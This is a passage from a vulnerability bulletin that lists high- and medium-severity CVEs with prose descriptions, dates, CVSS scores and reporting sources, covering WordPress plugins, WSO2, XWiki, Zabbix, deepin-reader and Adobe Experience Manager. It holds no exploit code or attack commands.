contact@wpscan.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WPVibes Redirect 404 Error Page to Homepage or Custom Page with Logs allows SQL Injection. This issue affects Redirect 404 Error Page to Homepage or Custom Page with Logs: from n/a through 1.8.7. 2023-12-18 7.2 CVE-2023-47530
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Link Whisper Link Whisper Free. This issue affects Link Whisper Free: from n/a through 0.6.5. 2023-12-20 7.2 CVE-2023-47852
audit@patchstack.com
wordpress — wordpress Exposure of Sensitive Information to an Unauthorized Actor vulnerability in HM Plugin WordPress Job Board and Recruitment Plugin – JobWP. This issue affects WordPress Job Board and Recruitment Plugin – JobWP: from n/a through 2.1. 2023-12-21 7.5 CVE-2023-48288
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WC Vendors WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors. This issue affects WC Vendors – WooCommerce Multi-Vendor, WooCommerce Marketplace, Product Vendors: from n/a through 2.4.7. 2023-12-19 7.6 CVE-2023-48327
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in QuantumCloud AI ChatBot. This issue affects AI ChatBot: from n/a through 4.7.8. 2023-12-19 7.2 CVE-2023-48741
audit@patchstack.com
wordpress — wordpress Server-Side Request Forgery (SSRF) vulnerability in Elegant Digital Solutions CommentLuv. This issue affects CommentLuv: from n/a through 3.0.4. 2023-12-15 7.5 CVE-2023-49159
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Younes JFR. Advanced Database Cleaner. This issue affects Advanced Database Cleaner: from n/a through 3.1.2. 2023-12-19 7.2 CVE-2023-49764
audit@patchstack.com
wordpress — wordpress The SmartCrawl WordPress plugin before 3.8.3 does not prevent unauthorized users from accessing password-protected posts’ content. 2023-12-18 7.5 CVE-2023-5949
contact@wpscan.com
wordpress — wordpress The Events Calendar WordPress plugin before 6.2.8.1 discloses the content of password protected posts to unauthenticated users via a crafted request 2023-12-18 7.5 CVE-2023-6203
contact@wpscan.com
wordpress — wordpress The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks. 2023-12-18 7.2 CVE-2023-6222
contact@wpscan.com
wordpress — wordpress The SiteOrigin Widgets Bundle WordPress plugin before 1.51.0 does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. 2023-12-18 7.2 CVE-2023-6295
contact@wpscan.com
wordpress — wordpress The E2Pdf plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the ‘import_action’ function in versions up to, and including, 1.20.25. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin, to upload arbitrary files on the affected site’s server which may make remote code execution possible. 2023-12-15 7.2 CVE-2023-6826
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.3.9 via the ‘content-backups’ and ‘content-name’, ‘content-manifest’, or ‘content-bmitmp’ and ‘content-identy’ HTTP headers. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible. 2023-12-23 7.5 CVE-2023-6972
security@wordfence.com
wordpress — wordpress The Backup Migration plugin for WordPress is vulnerable to OS Command Injection in all versions up to, and including, 1.3.9 via the ‘url’ parameter. This vulnerability allows authenticated attackers, with administrator-level permissions and above, to execute arbitrary commands on the host operating system. 2023-12-23 7.2 CVE-2023-7002
security@wordfence.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in WooCommerce AutomateWoo. This issue affects AutomateWoo: from n/a through 4.9.50. 2023-12-20 8.5 CVE-2023-33330
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Rajnish Arora Recently Viewed Products. This issue affects Recently Viewed Products: from n/a through 1.0.0. 2023-12-19 8.3 CVE-2023-34027
audit@patchstack.com
wordpress — wordpress Unrestricted Upload of File with Dangerous Type vulnerability in ThemePunch OHG Slider Revolution. This issue affects Slider Revolution: from n/a through 6.6.15. 2023-12-20 8.4 CVE-2023-47784
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. 2023-12-20 8.5 CVE-2023-49825
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in PenciDesign Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme. This issue affects Soledad – Multipurpose, Newspaper, Blog & WooCommerce WordPress Theme: from n/a through 8.4.1. 2023-12-21 8.1 CVE-2023-49826
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GuardGiant Brute Force Protection WordPress Brute Force Protection – Stop Brute Force Attacks. This issue affects WordPress Brute Force Protection – Stop Brute Force Attacks: from n/a through 2.2.5. 2023-12-19 7.6 CVE-2023-48764
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Guelben Bravo Translate. This issue affects Bravo Translate: from n/a through 1.2. 2023-12-20 7.6 CVE-2023-49161
audit@patchstack.com
wordpress — wordpress Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Magic Logix MSync. This issue affects MSync: from n/a through 1.0.0. 2023-12-20 7.6 CVE-2023-49166
audit@patchstack.com
wordpress — wordpress Deserialization of Untrusted Data vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc. This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.5.3. 2023-12-19 7.5 CVE-2023-49819
audit@patchstack.com
wso2 — multiple_products Multiple WSO2 products have been identified as vulnerable to user impersonation using JIT provisioning. For this vulnerability to have any impact on your deployment, the following conditions must be met: * An IDP configured for federated authentication and JIT provisioning enabled with the “Prompt for username, password and consent” option. * A service provider that uses the above IDP for federated authentication and has the “Assert identity using mapped local subject identifier” flag enabled. The attacker should have: * A fresh valid user account in the federated IDP that has not been used earlier. * Knowledge of the username of a valid user in the local IDP. When all preconditions are met, a malicious actor could use the JIT provisioning flow to perform user impersonation. 2023-12-15 8.5 CVE-2023-6837
ed10eef1-636d-4fbe-9993-6890dfa878f8
wso2 — multiple_products Multiple WSO2 products have been identified as vulnerable to an XML External Entity (XXE) attack, which abuses a widely available but rarely used feature of XML parsers to access sensitive information. 2023-12-15 7.5 CVE-2023-6836
ed10eef1-636d-4fbe-9993-6890dfa878f8
wuhan_deepin_technology_co.,_ltd. — deepin-reader Deepin Linux’s default document reader `deepin-reader` software suffers from a serious vulnerability in versions prior to 6.0.7 due to a design flaw that leads to remote command execution via a crafted docx document. This is a file overwrite vulnerability. Remote code execution (RCE) can be achieved by overwriting files like .bash_rc, .bash_login, etc. RCE will be triggered when the user opens the terminal. Version 6.0.7 contains a patch for the issue. 2023-12-22 9.3 CVE-2023-50254
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 4.5-rc-1 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the search administration interface doesn’t properly escape the id and label of search user interface extensions, allowing the injection of XWiki syntax containing script macros including Groovy macros that allow remote code execution, impacting the confidentiality, integrity and availability of the whole XWiki instance. This attack can be executed by any user who can edit some wiki page like the user’s profile (editable by default) as user interface extensions that will be displayed in the search administration can be added on any document by any user. The necessary escaping has been added in XWiki 14.10.15, 15.5.2 and 15.7RC1. As a workaround, the patch can be manually applied to the page `XWiki.SearchAdmin`. 2023-12-15 8.8 CVE-2023-50721
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, there is a reflected XSS or also direct remote code execution vulnerability in the code for displaying configurable admin sections. The code that can be passed through a URL parameter is only executed when the user who is visiting the crafted URL has edit right on at least one configuration section. While any user of the wiki could easily create such a section, this vulnerability doesn’t require the attacker to have an account or any access on the wiki. It is sufficient to trick any admin user of the XWiki installation to visit the crafted URL. This vulnerability allows full remote code execution with programming rights and thus impacts the confidentiality, integrity and availability of the whole XWiki installation. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patch can be manually applied to the document `XWiki.ConfigurableClass`. 2023-12-15 8.8 CVE-2023-50722
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 2.3 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, anyone who can edit an arbitrary wiki page in an XWiki installation can gain programming right through several cases of missing escaping in the code for displaying sections in the administration interface. This impacts the confidentiality, integrity and availability of the whole XWiki installation. Normally, all users are allowed to edit their own user profile so this should be exploitable by all users of the XWiki instance. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1. The patches can be manually applied to the `XWiki.ConfigurableClassMacros` and `XWiki.ConfigurableClass` pages. 2023-12-15 8.8 CVE-2023-50723
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It’s possible to execute a Velocity script without script right through the document tree. This has been patched in XWiki 14.10.7 and 15.2RC1. 2023-12-21 8.3 CVE-2023-50732
security-advisories@github.com
xwiki — xwiki XWiki Platform is a generic wiki platform. Starting in 7.2-milestone-2 and prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the password hashes of all users to anyone with view right on the respective user profiles. By default, all user profiles are public. This vulnerability also affects any configurations used by extensions that contain passwords like API keys that are viewable for the attacker. Normally, such passwords aren’t accessible but this vulnerability would disclose them as plain text. This has been patched in XWiki 14.10.15, 15.5.2 and 15.7RC1. There are no known workarounds for this vulnerability. 2023-12-15 7.5 CVE-2023-50719
security-advisories@github.com
zabbix — zabbix-agent The vulnerability is caused by an improper check of whether RDLENGTH overflows the buffer in the response from the DNS server. 2023-12-18 8.1 CVE-2023-32726
security@zabbix.com
zabbix — zabbix-agent2 The Zabbix Agent 2 item key smart.disk.get does not sanitize its parameters before passing them to a shell command, resulting in a possible remote code execution vulnerability. 2023-12-18 9.8 CVE-2023-32728
security@zabbix.com
zabbix — zabbix_server The website configured in the URL widget will receive a session cookie when testing or executing scheduled reports. The received session cookie can then be used to access the frontend as the particular user. 2023-12-18 8.8 CVE-2023-32725
security@zabbix.com
zabbix — zabbix_server An attacker who has the privilege to configure Zabbix items can use the function icmpping() with an additional malicious command inside it to execute arbitrary code on the current Zabbix server. 2023-12-18 7.2 CVE-2023-32727
security@zabbix.com


Medium Vulnerabilities

Primary Vendor — Product Description Published CVSS Score Source & Patch Info
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-47064
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-47065
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48440
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction. 2023-12-15 5.3 CVE-2023-48441
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48442
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48443
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48444
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48445
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48446
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48447
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48448
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48449
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48450
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48451
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48452
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48453
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48454
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48455
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48456
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48457
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48458
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48459
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48460
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48461
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48462
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48463
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48464
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48465
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48466
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48467
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48468
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48469
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48470
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48471
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48472
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48473
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48474
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48475
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48476
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48477
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48478
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48479
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48480
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2023-12-15 5.4 CVE-2023-48481
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48482
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48483
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48484
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48485
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48486
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48487
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48488
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48489
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48490
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48491
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48492
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48493
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48494
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48495
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48496
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48497
psirt@adobe.com
adobe — experience_manager Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim’s browser. 2023-12-15 5.4 CVE-2023-48498
psirt@adobe.com
